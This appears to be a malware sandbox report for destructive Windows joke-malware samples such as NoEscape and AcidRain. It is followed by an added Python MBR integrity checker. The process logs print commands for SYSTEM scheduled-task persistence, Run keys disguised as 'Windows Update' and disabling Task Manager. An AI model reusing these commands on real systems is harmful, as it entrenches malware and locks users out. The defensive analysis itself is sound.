memory/1632-386-0x0000000001EB0000-0x0000000001EB1000-memory.dmp
memory/2400-394-0x0000000002530000-0x0000000002531000-memory.dmp
memory/2904-415-0x0000000002110000-0x0000000002111000-memory.dmp
memory/2000-440-0x0000000002030000-0x0000000002031000-memory.dmp
memory/1060-443-0x0000000001F50000-0x0000000001F51000-memory.dmp
memory/1568-457-0x0000000002030000-0x0000000002031000-memory.dmp
memory/1752-516-0x00000000023B0000-0x00000000023B1000-memory.dmp
memory/424-518-0x0000000001F30000-0x0000000001F31000-memory.dmp
memory/1864-532-0x00000000003C0000-0x00000000003C1000-memory.dmp
memory/936-536-0x0000000000450000-0x0000000000451000-memory.dmp
memory/612-566-0x0000000001F10000-0x0000000001F11000-memory.dmp
memory/1416-583-0x0000000000510000-0x0000000000511000-memory.dmp
memory/2032-597-0x0000000002130000-0x0000000002131000-memory.dmp
memory/2636-622-0x00000000021B0000-0x00000000021B1000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win7-20240221-en
Max time kernel
114s
Max time network
41s
Command Line
Signatures
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Fizz.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Fizz.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Fizz.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Fizz.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Fizz.exe"
Network
Files
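Fizz.exe here, bootrec.exe in behavioral24 and boot.exe in behavioral29 all open `\??\PhysicalDrive0` for modification, which is how the sandbox records a write to the start of the system disk. The report does not show the bytes written, so the reliable check on a suspect image or host is structural: read sector 0, confirm the 0x55AA signature, validate the partition table and compare the 440-byte bootstrap area against a known-good hash taken from a clean build. The Python below is an added example, not part of the report. It parses an MBR and runs those checks over constructed sectors (a plausible clean layout and a hypothetical overwrite; neither is derived from these samples). On a live Windows host the user-mode name for the same device is `\\.\PhysicalDrive0` and reading it requires administrator rights.

```python
r"""Structural check of an MBR sector from a disk image or a \\.\PhysicalDrive0 dump.
Added example, not sandbox code.  The sample sectors below are constructed."""
import hashlib
import struct
from dataclasses import dataclass
from typing import Dict, List

SECTOR = 512
BOOT_SIG = 0xAA55          # stored little-endian as 55 AA at offset 510
BOOTSTRAP_LEN = 440        # code area before the 4-byte disk signature
PART_FMT = "<B3BB3BII"     # status, CHS start, type, CHS end, LBA start, sector count


@dataclass(frozen=True)
class Partition:
    status: int
    ptype: int
    lba_start: int
    sectors: int


def parse_mbr(sector: bytes) -> Dict[str, object]:
    if len(sector) != SECTOR:
        raise ValueError(f"expected {SECTOR} bytes, got {len(sector)}")
    parts = []
    for i in range(4):
        status, _, _, _, ptype, _, _, _, lba, count = struct.unpack_from(PART_FMT, sector, 446 + 16 * i)
        parts.append(Partition(status, ptype, lba, count))
    return {
        "bootstrap_sha256": hashlib.sha256(sector[:BOOTSTRAP_LEN]).hexdigest(),
        "disk_signature": struct.unpack_from("<I", sector, BOOTSTRAP_LEN)[0],
        "partitions": parts,
        "signature_ok": struct.unpack_from("<H", sector, 510)[0] == BOOT_SIG,
    }


def check_mbr(sector: bytes, baseline_bootstrap_sha256: str) -> List[str]:
    """Return problems found; an empty list means the sector matches the baseline and is sane."""
    info = parse_mbr(sector)
    parts: List[Partition] = info["partitions"]  # type: ignore[assignment]
    issues = []
    if not info["signature_ok"]:
        issues.append("boot signature 0x55AA missing")
    if info["bootstrap_sha256"] != baseline_bootstrap_sha256:
        issues.append("bootstrap code differs from baseline")
    if not any(p.ptype for p in parts):
        issues.append("partition table empty")
    if sum(p.status == 0x80 for p in parts) > 1:
        issues.append("more than one active partition")
    for p in parts:
        if p.status not in (0x00, 0x80):
            issues.append(f"invalid status byte 0x{p.status:02x}")
        if p.ptype == 0 and (p.lba_start or p.sectors):
            issues.append("unused entry has a non-zero extent")
    extents = sorted((p.lba_start, p.lba_start + p.sectors) for p in parts if p.ptype)
    if any(b0 < a1 for (a0, a1), (b0, b1) in zip(extents, extents[1:])):
        issues.append("partition extents overlap")
    return issues


def build_sector(bootstrap: bytes, disk_sig: int, parts: List[Partition], sig: int = BOOT_SIG) -> bytes:
    """Assemble a test sector; CHS fields are left zero."""
    buf = bytearray(SECTOR)
    buf[:BOOTSTRAP_LEN] = bootstrap.ljust(BOOTSTRAP_LEN, b"\x00")[:BOOTSTRAP_LEN]
    struct.pack_into("<I", buf, BOOTSTRAP_LEN, disk_sig)
    for i, p in enumerate(parts[:4]):
        struct.pack_into(PART_FMT, buf, 446 + 16 * i, p.status, 0, 0, 0, p.ptype, 0, 0, 0, p.lba_start, p.sectors)
    struct.pack_into("<H", buf, 510, sig)
    return bytes(buf)


def read_first_sector(path: str) -> bytes:
    r"""path is a disk image, or '\\.\PhysicalDrive0' on Windows (administrator required)."""
    with open(path, "rb") as fh:
        return fh.read(SECTOR)


# Constructed sectors: a plausible clean layout (bootstrap bytes are a stand-in, not real
# boot code) and a hypothetical overwrite with the code replaced and the table zeroed.
CLEAN_BOOTSTRAP = bytes(range(256)) + bytes(BOOTSTRAP_LEN - 256)
CLEAN = build_sector(CLEAN_BOOTSTRAP, 0x1234ABCD, [Partition(0x80, 0x07, 2048, 204800)])
BASELINE = parse_mbr(CLEAN)["bootstrap_sha256"]
TAMPERED = build_sector(b"\x90" * BOOTSTRAP_LEN, 0x1234ABCD, [])
NO_SIG = build_sector(CLEAN_BOOTSTRAP, 0x1234ABCD, [Partition(0x80, 0x07, 2048, 204800)], sig=0)

if __name__ == "__main__":
    for name, sec in (("clean", CLEAN), ("tampered", TAMPERED), ("no-signature", NO_SIG)):
        print(name, check_mbr(sec, BASELINE) or "OK")
```

The baseline hash has to come from a trusted source (the same image before detonation, or a gold build), because the bootstrap area legitimately differs between Windows versions and OEM tools. On a GPT disk sector 0 still carries a protective MBR with a single type 0xEE entry, so the same parser applies; the overlap and active-partition checks simply have nothing to flag there.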
Analysis: behavioral29
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win7-20240221-en
Max time kernel
145s
Max time network
134s
Command Line
Signatures
Disables Task Manager via registry modification
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\yourpc\boot.exe | N/A |
| N/A | N/A | C:\yourpc\INV.exe | N/A |
| N/A | N/A | C:\yourpc\tunnel.exe | N/A |
| N/A | N/A | C:\yourpc\melter.exe | N/A |
| N/A | N/A | C:\yourpc\10.exe | N/A |
| N/A | N/A | C:\yourpc\Magix.exe | N/A |
| N/A | N/A | C:\yourpc\RGB.exe | N/A |
| N/A | N/A | C:\yourpc\gl.exe | N/A |
| N/A | N/A | C:\yourpc\test.exe | N/A |
| N/A | N/A | C:\yourpc\Circle2.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "C:\\yourpc\\boot.exe" | C:\yourpc\boot.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\yourpc\boot.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NoEscape8.0.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NoEscape8.0.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\yourpc\skid.bat" "
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\yourpc\run.vbs"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\yourpc\main.bat" "
C:\yourpc\boot.exe
boot.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART /TR "C:\yourpc\boot.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\yourpc\es.vbs"
C:\Windows\SysWOW64\reg.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\timeout.exe
timeout 10
C:\yourpc\INV.exe
INV.exe
C:\yourpc\tunnel.exe
tunnel.exe
C:\yourpc\melter.exe
melter.exe
C:\yourpc\10.exe
10.exe
C:\yourpc\Magix.exe
Magix.exe
C:\Windows\SysWOW64\timeout.exe
timeout 30
C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Documents and Settings\Administrator\Desktop\18769.txt
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im tunnel.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im INV.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im melter.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Magix.exe
C:\Windows\SysWOW64\timeout.exe
timeout 20
C:\yourpc\RGB.exe
RGB.exe
C:\yourpc\gl.exe
gl.exe
C:\yourpc\test.exe
test.exe
C:\Windows\SysWOW64\timeout.exe
timeout 30
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im RGB.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im gl.exe
C:\yourpc\Circle2.exe
Circle2.exe
C:\Windows\SysWOW64\timeout.exe
timeout 30
Network
Files
C:\yourpc\skid.bat
C:\yourpc\run.vbs
C:\yourpc\main.bat
C:\yourpc\boot.exe
C:\yourpc\es.vbs
\yourpc\INV.exe
C:\yourpc\tunnel.exe
\yourpc\melter.exe
C:\yourpc\10.exe
C:\yourpc\Magix.exe
\yourpc\RGB.exe
C:\yourpc\test.exe
C:\yourpc\gl.exe
\yourpc\Circle2.exe
Analysis: behavioral32
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:34
Platform
win10v2004-20240226-en
Max time kernel
55s
Max time network
162s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Media\PCshakingv4.0.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\Media\\logotip.jpg" | C:\Windows\Media\PCshakingv4.0.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Media\PCshakingv4.0.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3524 wrote to memory of 4800 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe | C:\Windows\Media\PCshakingv4.0.exe |
| PID 3524 wrote to memory of 4800 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe | C:\Windows\Media\PCshakingv4.0.exe |
| PID 3524 wrote to memory of 4800 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe | C:\Windows\Media\PCshakingv4.0.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe"
C:\Windows\Media\PCshakingv4.0.exe
"C:\Windows\Media\PCshakingv4.0.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x460 0x508
Network
Files
C:\Windows\Media\PCshakingv4.0.exe
\??\c:\Windows\Media\Tobu.wav
C:\Windows\Media\mouse.ico
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:32
Platform
win7-20240221-en
Max time kernel
137s
Max time network
121s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\bytebeat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\mbr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\Magix.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\bytebeat1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\rgb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\snd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\gl1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\circle.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1D50.tmp\\mbr.exe" | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\mbr.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\mbr.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\mbr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\bytebeat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\bytebeat1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\rgb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\snd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\gl1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1D50.tmp\circle.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\@_136 @828#-138389J-SJFJDSM.exe
"C:\Users\Admin\AppData\Local\Temp\@_136 @828#-138389J-SJFJDSM.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1D50.tmp\1D51.bat "C:\Users\Admin\AppData\Local\Temp\@_136 @828#-138389J-SJFJDSM.exe""
C:\Windows\system32\cscript.exe
cscript prompt.vbs
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\mbr.exe
mbr.exe
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\bytebeat.exe
bytebeat.exe
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\Magix.exe
Magix.exe
C:\Windows\system32\timeout.exe
timeout 30
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\1D50.tmp\mbr.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im bytebeat.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im Magix.exe
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\bytebeat1.exe
bytebeat1.exe
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\test.exe
test.exe
C:\Windows\system32\timeout.exe
timeout 40
C:\Windows\system32\taskkill.exe
taskkill /f /im bytebeat1.exe
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\rgb.exe
rgb.exe
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\snd.exe
snd.exe
C:\Windows\system32\timeout.exe
timeout 50
C:\Windows\system32\taskkill.exe
taskkill /f /im rgb.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im snd.exe
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\gl1.exe
gl1.exe
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\circle.exe
circle.exe
C:\Windows\system32\timeout.exe
timeout 65
Network
Files
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\1D51.bat
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\prompt.vbs
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\mbr.exe
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\bytebeat.exe
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\Magix.exe
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\bytebeat.wav
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\bytebeat1.exe
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\test.exe
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\bytebeat1.wav
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\rgb.exe
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\snd.exe
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\noise.wav
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\gl1.exe
C:\Users\Admin\AppData\Local\Temp\1D50.tmp\circle.exe
Analysis: behavioral4
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win10v2004-20240226-en
Max time kernel
149s
Max time network
160s
Command Line
Signatures
Disables Task Manager via registry modification
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\n0rt0nant1ldks.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hifjdnfejfnejnkdpamzm.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\__tmp_rar_sfx_access_check_240608218 | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sodnciwkms.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\NyanCatIsHere.exe" | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\SysWOW64\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\SysWOW64\mspaint.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mspaint.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
